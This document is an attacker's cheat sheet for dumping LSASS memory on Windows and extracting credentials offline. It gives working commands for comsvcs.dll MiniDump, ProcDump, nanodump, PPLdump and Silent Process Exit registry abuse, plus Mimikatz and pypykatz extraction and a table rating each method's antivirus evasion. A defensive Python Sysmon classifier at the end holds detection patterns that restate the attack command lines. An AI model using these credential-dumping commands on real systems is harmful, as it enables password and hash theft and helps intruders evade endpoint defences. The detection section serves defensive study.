Overview

LSASS (Local Security Authority Subsystem Service) holds credentials in memory. When Mimikatz is blocked by AV/EDR, use these alternatives to dump LSASS and extract credentials offline.

comsvcs.dll (LOLBIN)

Built-in Windows DLL. No download needed.

Find LSASS PID

# cmd
tasklist | findstr lsass
# PowerShell
Get-Process lsass | Select Id

Dump

# cmd (replace <PID> with the LSASS process ID found above)
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\Windows\Temp\lsass.dmp full
# PowerShell
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\Windows\Temp\lsass.dmp full

Requires SeDebugPrivilege. Run from an elevated prompt.

ProcDump (Sysinternals)

Microsoft-signed binary — often whitelisted by AV.

Download: https://learn.microsoft.com/en-us/sysinternals/downloads/procdump

Dump

procdump.exe -accepteula -ma lsass.exe lsass.dmp

By PID

procdump.exe -accepteula -ma <PID> lsass.dmp

Task Manager (GUI)

If RDP access is available:
  1. Open Task Manager
  2. Go to the Details tab
  3. Right-click lsass.exe and choose "Create dump file"
  4. The file is saved to C:\Users\%USERNAME%\AppData\Local\Temp\lsass.DMP

Direct Syscalls — nanodump

Avoids API hooking by using direct syscalls. Effective against EDR.
https://github.com/helpsystems/nanodump
nanodump.exe -w lsass.dmp

PPLdump (Protected Process Light)

If LSASS runs as PPL (Protected Process Light):
https://github.com/itm4n/PPLdump
PPLdump.exe lsass.exe lsass.dmp
Note: the KnownDlls cache flaw PPLdump relies on was fixed by Microsoft in July 2022, so the tool fails on patched systems.

Silent Process Exit (Abuse Windows Error Reporting)

Configure WER to dump LSASS on “exit”:
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe" /v LocalDumpFolder /t REG_SZ /d "C:\Windows\Temp"

Extract Credentials from Dump (Attacker)

Mimikatz (Offline)

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

pypykatz (Python — No Windows Needed)

pip3 install pypykatz
pypykatz lsa minidump lsass.dmp

Save Output to a File (then filter for NTLM hashes)

pypykatz lsa minidump lsass.dmp -o hashes.txt

Quick Reference

Method        | Needs Download | AV Evasion | Notes
------------- | -------------- | ---------- | ----------------
comsvcs.dll   | No             | Medium     | Built-in LOLBIN
ProcDump      | Yes            | High       | Microsoft-signed
Task Manager  | No             | High       | GUI only (RDP)
nanodump      | Yes            | Very High  | Direct syscalls
PPLdump       | Yes            | High       | Bypasses PPL
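Detection logic for the methods above, as an added example that is not part of the original page: a small Python classifier run over constructed Sysmon-style events (process create, process access and registry value set). The sample events, the allow-list and the label strings are assumptions made for the example.

```python
import re
# Constructed sample events using Sysmon field names (not real telemetry):
# EventID 1 = process create, 10 = process access, 13 = registry value set.
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 624 C:\Windows\Temp\lsass.dmp full"},
    {"EventID": 1, "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsass.dmp"},
    {"EventID": 1, "CommandLine": r"C:\Windows\notepad.exe C:\Users\bob\notes.txt"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe\GlobalFlag",
     "Details": "DWORD (0x00000200)"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe\ReportingMode",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 10, "SourceImage": r"C:\Windows\Temp\nanodump.exe", "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    {"EventID": 10, "SourceImage": r"C:\Windows\system32\csrss.exe", "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000"},
]

# Command lines of the dump tools listed on this page.
CMDLINE_RULES = [
    ("comsvcs.dll MiniDump", re.compile(r"comsvcs\.dll.*\bMiniDump\b", re.I)),
    ("ProcDump full dump of lsass", re.compile(r"procdump.*\s-ma\s+lsass", re.I)),
    ("nanodump/PPLdump binary", re.compile(r"\b(nanodump|PPLdump)\.exe", re.I)),
]
# Registry writes that configure Silent Process Exit dumping for lsass.exe.
IFEO_GLOBALFLAG = re.compile(r"\\Image File Execution Options\\lsass\.exe\\GlobalFlag$", re.I)
SPE_KEY = re.compile(r"\\SilentProcessExit\\lsass\.exe\\(ReportingMode|LocalDumpFolder)$", re.I)
SPE_FLAG = re.compile(r"0x0*200\)?$", re.I)  # FLG_MONITOR_SILENT_PROCESS_EXIT = 0x200 (512 decimal)
PROCESS_VM_READ = 0x0010                      # access right needed to read LSASS memory
ALLOWED_SOURCES = {r"c:\windows\system32\csrss.exe"}  # constructed allow-list; tune per estate

def classify(event):
    """Return the detection labels that fire for one event (empty list if none)."""
    eid, hits = event.get("EventID"), []
    if eid == 1:
        cmd = event.get("CommandLine", "")
        hits += [label for label, rx in CMDLINE_RULES if rx.search(cmd)]
    elif eid == 13:
        target, details = event.get("TargetObject", ""), event.get("Details", "")
        if IFEO_GLOBALFLAG.search(target) and SPE_FLAG.search(details):
            hits.append("IFEO GlobalFlag 0x200 set on lsass.exe (Silent Process Exit)")
        elif SPE_KEY.search(target):
            hits.append("SilentProcessExit configured for lsass.exe")
    elif eid == 10 and event.get("TargetImage", "").lower().endswith(r"\lsass.exe"):
        access = int(event.get("GrantedAccess", "0"), 16)
        if access & PROCESS_VM_READ and event.get("SourceImage", "").lower() not in ALLOWED_SOURCES:
            hits.append(f"LSASS memory-read handle from {event['SourceImage']} (0x{access:X})")
    return hits

def scan(events):
    """Map event index -> findings, keeping only events that fired."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}
```

Running `scan(SAMPLE_EVENTS)` flags the comsvcs.dll and ProcDump command lines, both Silent Process Exit registry writes and the nanodump handle to LSASS, while the notepad launch and the csrss.exe handle stay quiet.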